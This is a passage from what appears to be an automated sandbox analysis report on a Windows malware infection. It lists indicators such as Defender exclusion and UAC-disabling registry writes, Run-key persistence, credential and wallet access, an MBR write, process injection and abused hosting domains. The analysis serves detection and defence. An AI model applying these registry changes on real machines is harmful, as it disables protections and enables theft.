6892 liveupdate.exe 5968 User%20OOBE%20Broker.exe 5968 User%20OOBE%20Broker.exe 5968 User%20OOBE%20Broker.exe 8148 registers.exe 8148 registers.exe 5968 User%20OOBE%20Broker.exe 5968 User%20OOBE%20Broker.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/2392-437-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2392-438-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2392-452-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2392-444-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2392-468-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2392-474-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2392-470-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2392-478-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2392-476-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2392-496-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2392-497-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/files/0x000600000001ae5a-11040.dat upx behavioral2/files/0x000700000001ae5c-11086.dat upx -
Uses the VBS compiler for execution 1 TTPs
-
Processes:
File300un.exed21cbe21e38b385a41a68c5e6dd32f4c.exeniks.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions File300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths File300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Files\File300un.exe = "0" File300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features niks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" niks.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
openwith.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook openwith.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook openwith.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook openwith.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook openwith.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook openwith.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook openwith.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 20 IoCs
Processes:
96CD.execsrss.exeimages.exeasg.exenpp.8.6.2.Installer.x64.exesc.exeexplorgu.exenpp86Installerx64.exe1800.exeviewer.exed21cbe21e38b385a41a68c5e6dd32f4c.exeNINJA.exe_vti_cnf.exeTemp1.exeWattyl.exe23.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\24d0272b-cda1-42f8-be99-bd7f28cf6634\\96CD.exe\" --AutoStart" 96CD.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\Yahoo Messengger = "C:\\Windows\\system32\\RVHOST.exe" images.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\WSUS Update Client = "\"C:\\Windows\\SysWOW64\\SubDir\\asg.exe\"" asg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\cvvchost = "C:\\Users\\Admin\\AppData\\Local\\cvvchost.exe" npp.8.6.2.Installer.x64.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\sc.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\sc.exe" sc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\fu.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000031001\\fu.exe" explorgu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" npp86Installerx64.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-BAHBFO = "\"C:\\ProgramData\\viewer\\viewer.exe\"" 1800.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-BAHBFO = "\"C:\\ProgramData\\viewer\\viewer.exe\"" viewer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-BAHBFO = "\"C:\\ProgramData\\viewer\\viewer.exe\"" 1800.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\SBADLH = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\system.exe\"" NINJA.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\Yahoo Messengger = "C:\\Windows\\system32\\RVHOST.exe" _vti_cnf.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-BAHBFO = "\"C:\\ProgramData\\viewer\\viewer.exe\"" viewer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\ladas.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000395001\\ladas.exe" explorgu.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\dota.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000396001\\dota.exe" explorgu.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\WSUS Update Client = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\Temp1.exe\"" Temp1.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\Yahoo Messengger = "C:\\Windows\\system32\\RVHOST.exe" Wattyl.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe" 23.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
File300un.exefilename.exeupdater.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA File300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" File300un.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA filename.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops desktop.ini file(s) 3 IoCs
Processes:
abc.exerty37.exedescription ioc Process File opened for modification C:\$Recycle.Bin\S-1-5-21-3063448957-1373478339-3486599166-1000\desktop.ini abc.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3063448957-1373478339-3486599166-1000\desktop.ini abc.exe File opened for modification C:\$RECYCLE.BIN\S-1-5-21-3063448957-1373478339-3486599166-1000\desktop.ini rty37.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeHelper.exemsiexec.exe_vti_cnf.exedescription ioc Process File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\J: Helper.exe File opened (read-only) \??\L: Helper.exe File opened (read-only) \??\X: Helper.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\u: _vti_cnf.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\a: _vti_cnf.exe File opened (read-only) \??\n: _vti_cnf.exe File opened (read-only) \??\E: Helper.exe File opened (read-only) \??\G: Helper.exe File opened (read-only) \??\Q: Helper.exe File opened (read-only) \??\S: Helper.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\y: _vti_cnf.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\b: _vti_cnf.exe File opened (read-only) \??\I: Helper.exe File opened (read-only) \??\W: Helper.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: Helper.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\s: _vti_cnf.exe File opened (read-only) \??\z: _vti_cnf.exe File opened (read-only) \??\V: Helper.exe File opened (read-only) \??\Z: Helper.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\k: _vti_cnf.exe File opened (read-only) \??\r: _vti_cnf.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\m: _vti_cnf.exe File opened (read-only) \??\A: Helper.exe File opened (read-only) \??\M: Helper.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\q: _vti_cnf.exe File opened (read-only) \??\e: _vti_cnf.exe File opened (read-only) \??\o: _vti_cnf.exe File opened (read-only) \??\P: Helper.exe File opened (read-only) \??\R: Helper.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\x: _vti_cnf.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\t: _vti_cnf.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 51 IoCs
Processes:
flow ioc 313 raw.githubusercontent.com 1154 raw.githubusercontent.com 1711 raw.githubusercontent.com 1305 raw.githubusercontent.com 8 raw.githubusercontent.com 10 raw.githubusercontent.com 1013 raw.githubusercontent.com 1016 raw.githubusercontent.com 1002 raw.githubusercontent.com 1583 raw.githubusercontent.com 1646 raw.githubusercontent.com 1037 raw.githubusercontent.com 1209 bitbucket.org 1294 raw.githubusercontent.com 1218 raw.githubusercontent.com 1640 raw.githubusercontent.com 1655 raw.githubusercontent.com 1155 raw.githubusercontent.com 1704 raw.githubusercontent.com 1330 raw.githubusercontent.com 1580 raw.githubusercontent.com 1643 raw.githubusercontent.com 1015 raw.githubusercontent.com 1023 raw.githubusercontent.com 1233 raw.githubusercontent.com 1709 raw.githubusercontent.com 1713 raw.githubusercontent.com 1313 raw.githubusercontent.com 1152 raw.githubusercontent.com 1208 bitbucket.org 1577 raw.githubusercontent.com 124 bitbucket.org 312 raw.githubusercontent.com 1024 raw.githubusercontent.com 1150 raw.githubusercontent.com 1587 raw.githubusercontent.com 1085 raw.githubusercontent.com 1088 raw.githubusercontent.com 1089 raw.githubusercontent.com 1549 raw.githubusercontent.com 1574 raw.githubusercontent.com 1025 raw.githubusercontent.com 1086 raw.githubusercontent.com 1043 raw.githubusercontent.com 123 bitbucket.org 843 raw.githubusercontent.com 1227 raw.githubusercontent.com 1515 bitbucket.org 1022 raw.githubusercontent.com 1212 raw.githubusercontent.com 1556 raw.githubusercontent.com -
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 172 api.2ip.ua 944 api.ipify.org 1018 whoer.net 1019 whoer.net 1223 api.ipify.org 40 ip-api.com 96 api.2ip.ua 97 api.2ip.ua -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc Process File opened for modification \??\WinMonFS csrss.exe -
Modifies powershell logging option 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
7e207560.exedescription ioc Process File opened for modification \??\PhysicalDrive0 7e207560.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral2/files/0x000600000001ad01-5100.dat autoit_exe -
Drops file in System32 directory 24 IoCs
Processes:
images.exefilename.exepowershell.exepowershell.exe_vti_cnf.exeTemp1.exeWattyl.exeFourthX.exepowershell.exepowershell.exepowershell.exepowershell.exeasg.exepowershell.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\RVHOST.exe images.exe File opened for modification C:\Windows\system32\MRT.exe filename.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File opened for modification C:\Windows\SysWOW64\RVHOST.exe _vti_cnf.exe File opened for modification C:\Windows\SysWOW64\SubDir\asg.exe Temp1.exe File opened for modification C:\Windows\SysWOW64\RVHOST.exe Wattyl.exe File created C:\Windows\SysWOW64\setting.ini _vti_cnf.exe File opened for modification C:\Windows\system32\MRT.exe FourthX.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\RVHOST.exe _vti_cnf.exe File opened for modification C:\Windows\SysWOW64\setting.ini _vti_cnf.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File opened for modification C:\Windows\SysWOW64\SubDir\asg.exe asg.exe File opened for modification C:\Windows\SysWOW64\SubDir asg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\SubDir\asg.exe Temp1.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
abc.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\1YwR2c1YK.bmp" abc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\1YwR2c1YK.bmp" abc.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
Conhost.execmd.exefilename.exeniks.exeamert.exeexplorgu.exeexplorgu.exeladas.exeupdater.exedota.exeexplorgu.exeexplorgu.exeladas.exeabc.exeexplorgu.exerhsgn_protected.exeexplorgu.exeplaza.execmd.exepid Process 2176 Conhost.exe 5852 cmd.exe 5020 filename.exe 2888 niks.exe 4040 amert.exe 4516 explorgu.exe 5840 explorgu.exe 1368 ladas.exe 2664 updater.exe 4900 dota.exe 4900 dota.exe 4900 dota.exe 4900 dota.exe 4900 dota.exe 4900 dota.exe 5932 explorgu.exe 4900 dota.exe 4900 dota.exe 4900 dota.exe 4900 dota.exe 4900 dota.exe 5316 explorgu.exe 4900 dota.exe 4900 dota.exe 4680 ladas.exe 4900 dota.exe 4900 dota.exe 4900 dota.exe 6948 abc.exe 6740 explorgu.exe 6948 abc.exe 6948 abc.exe 6948 abc.exe 6948 abc.exe 6948 abc.exe 4900 dota.exe 6264 rhsgn_protected.exe 6264 rhsgn_protected.exe 4900 dota.exe 6264 rhsgn_protected.exe 4900 dota.exe 6264 rhsgn_protected.exe 4900 dota.exe 6264 rhsgn_protected.exe 4900 dota.exe 6264 rhsgn_protected.exe 8132 explorgu.exe 7372 plaza.exe 4900 dota.exe 6264 rhsgn_protected.exe 7372 plaza.exe 4900 dota.exe 7372 plaza.exe 4900 dota.exe 7372 plaza.exe 6416 cmd.exe 7372 plaza.exe 4900 dota.exe 7372 plaza.exe 4900 dota.exe 7372 plaza.exe 4900 dota.exe 7372 plaza.exe 4900 dota.exe -
Suspicious use of SetThreadContext 44 IoCs
Processes:
.exeFile300un.exeConhost.exeBEF8.exefor.exefirefox.exebuild2.exe4AD0.exeConhost.exeghjk.exeinstall.exebuild3.exeasdfg.exegzexiztdwrwd.exelolololoMRK123.exefor.exeopenwith.exeNational.exeBBLb.exeplink.exegoldprime12241421421.exeiojmibhyhiws.exemode.comlumma123142124.exeghost.exenative.exeviewer.exea0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exeabtc8mhlbehqil.exehiuhehufw.exeliveupdate.exenpp.8.6.2.Installer.x64.execmd.execrpta.exef4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exegpupdate.exeminuscrypt_crypted.exeexplorgu.execertutil.exe865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exesoft.exe96CD.exelumma1234.exedescription pid Process procid_target PID 4800 set thread context of 2392 4800 .exe 134 PID 664 set thread context of 2856 664 File300un.exe 145 PID 2292 set thread context of 4268 2292 Conhost.exe 164 PID 1668 set thread context of 4856 1668 BEF8.exe 185 PID 876 set thread context of 512 876 for.exe 188 PID 4480 set thread context of 2572 4480 firefox.exe 194 PID 5072 set thread context of 1336 5072 build2.exe 200 PID 5132 set thread context of 6104 5132 4AD0.exe 209 PID 1600 set thread context of 5508 1600 Conhost.exe 210 PID 4812 set thread context of 5524 4812 ghjk.exe 215 PID 5428 set thread context of 2140 5428 install.exe 591 PID 4360 set thread context of 1332 4360 build3.exe 238 PID 4028 set thread context of 6216 4028 asdfg.exe 322 PID 5204 set thread context of 4112 5204 gzexiztdwrwd.exe 340 PID 616 set thread context of 7128 616 lolololoMRK123.exe 341 PID 5448 set thread context of 6936 5448 for.exe 346 PID 6620 set thread context of 6408 6620 openwith.exe 357 PID 6896 set thread context of 6432 6896 National.exe 372 PID 4696 set thread context of 5276 4696 BBLb.exe 384 PID 7388 set thread context of 7436 7388 plink.exe 399 PID 828 set thread context of 7512 828 goldprime12241421421.exe 414 PID 5784 set thread context of 7808 5784 iojmibhyhiws.exe 417 PID 5784 set thread context of 7224 5784 iojmibhyhiws.exe 421 PID 5660 set thread context of 7456 5660 mode.com 431 PID 224 set thread context of 3604 224 lumma123142124.exe 432 PID 6968 set thread context of 5580 6968 ghost.exe 449 PID 7840 set thread context of 6488 7840 native.exe 469 PID 7036 set thread context of 6880 7036 viewer.exe 481 PID 4364 set thread context of 7468 4364 a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe 492 PID 5780 set thread context of 7180 5780 abtc8mhlbehqil.exe 678 PID 3332 set thread context of 6736 3332 hiuhehufw.exe 508 PID 6892 set thread context of 6552 6892 liveupdate.exe 531 PID 6252 set thread context of 5760 6252 npp.8.6.2.Installer.x64.exe 542 PID 6816 set thread context of 4744 6816 cmd.exe 552 PID 7464 set thread context of 6420 7464 crpta.exe 561 PID 7004 set thread context of 6716 7004 f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe 606 PID 8512 set thread context of 3800 8512 gpupdate.exe 57 PID 6724 set thread context of 7648 6724 minuscrypt_crypted.exe 638 PID 9176 set thread context of 8712 9176 explorgu.exe 682 PID 8564 set thread context of 7012 8564 certutil.exe 683 PID 8392 set thread context of 8124 8392 865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe 701 PID 8844 set thread context of 6696 8844 soft.exe 704 PID 5348 set thread context of 8392 5348 96CD.exe 725 PID 9104 set thread context of 8452 9104 lumma1234.exe 738 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
d21cbe21e38b385a41a68c5e6dd32f4c.exedescription ioc Process File opened (read-only) \??\VBoxMiniRdrDN d21cbe21e38b385a41a68c5e6dd32f4c.exe -
Drops file in Program Files directory 4 IoCs
Processes:
chrome.exepowershell.exedescription ioc Process File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log powershell.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
d21cbe21e38b385a41a68c5e6dd32f4c.exe_vti_cnf.exemsiexec.exeWattyl.exeschtasks.execp.execmd.exeAmadey.exeimages.exeamert.exedescription ioc Process File opened for modification C:\Windows\rss d21cbe21e38b385a41a68c5e6dd32f4c.exe File opened for modification C:\Windows\RVHOST.exe _vti_cnf.exe File opened for modification C:\Windows\Installer\e60b1d0.msi msiexec.exe File opened for modification C:\Windows\RVHOST.exe Wattyl.exe File opened for modification C:\Windows\Installer\MSI76F4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4B66.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT schtasks.exe File created C:\Windows\RVHOST.exe _vti_cnf.exe File created C:\Windows\Installer\e60b1d0.msi msiexec.exe File created C:\Windows\Tasks\MSI.CentralServer.job cp.exe File opened for modification C:\Windows\Installer\MSI17F0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2A50.tmp msiexec.exe File created C:\Windows\rss\csrss.exe d21cbe21e38b385a41a68c5e6dd32f4c.exe File created C:\Windows\Tasks\explorgu.job cmd.exe File created C:\Windows\Tasks\chrosha.job Amadey.exe File opened for modification C:\Windows\RVHOST.exe images.exe File created C:\Windows\Tasks\explorgu.job amert.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri schtasks.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe -
Launches sc.exe 26 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 7400 sc.exe 9128 sc.exe 7180 sc.exe 4788 sc.exe 5980 sc.exe 4324 sc.exe 5444 sc.exe 4244 sc.exe 6556 sc.exe 5584 sc.exe 3512 sc.exe 7908 sc.exe 7392 sc.exe 5964 sc.exe 4792 sc.exe 7264 sc.exe 7276 sc.exe 6328 sc.exe 6788 sc.exe 1728 sc.exe 3388 sc.exe 6484 sc.exe 2124 sc.exe 1732 sc.exe 5672 sc.exe 7088 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 53 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 924 5068 WerFault.exe 75 4188 524 WerFault.exe 76 4896 524 WerFault.exe 76 2620 524 WerFault.exe 76 628 524 WerFault.exe 76 1812 524 WerFault.exe 76 2572 524 WerFault.exe 76 4584 524 WerFault.exe 76 1208 524 WerFault.exe 76 2004 524 WerFault.exe 76 3776 524 WerFault.exe 76 3676 524 WerFault.exe 76 1960 524 WerFault.exe 76 1520 524 WerFault.exe 76 2204 524 WerFault.exe 76 1192 524 WerFault.exe 76 3980 524 WerFault.exe 76 1732 524 WerFault.exe 76 4468 524 WerFault.exe 76 4652 524 WerFault.exe 76 4676 2636 WerFault.exe 105 2368 2784 WerFault.exe 117 2164 2784 WerFault.exe 117 1460 2784 WerFault.exe 117 2868 2784 WerFault.exe 117 208 2784 WerFault.exe 117 4636 2784 WerFault.exe 117 3632 2784 WerFault.exe 117 2660 2784 WerFault.exe 117 1116 2784 WerFault.exe 117 4684 4840 WerFault.exe 140 488 4840 WerFault.exe 140 4288 4840 WerFault.exe 140 2244 4840 WerFault.exe 140 2480 4840 WerFault.exe 140 1400 4840 WerFault.exe 140 4340 4840 WerFault.exe 140 1132 2172 WerFault.exe 165 4680 2172 WerFault.exe 165 2960 2172 WerFault.exe 165 4272 2172 WerFault.exe 165 1132 2172 WerFault.exe 165 1460 2172 WerFault.exe 165 4532 2172 WerFault.exe 165 4792 2172 WerFault.exe 165 5072 2172 WerFault.exe 165 5952 1336 WerFault.exe 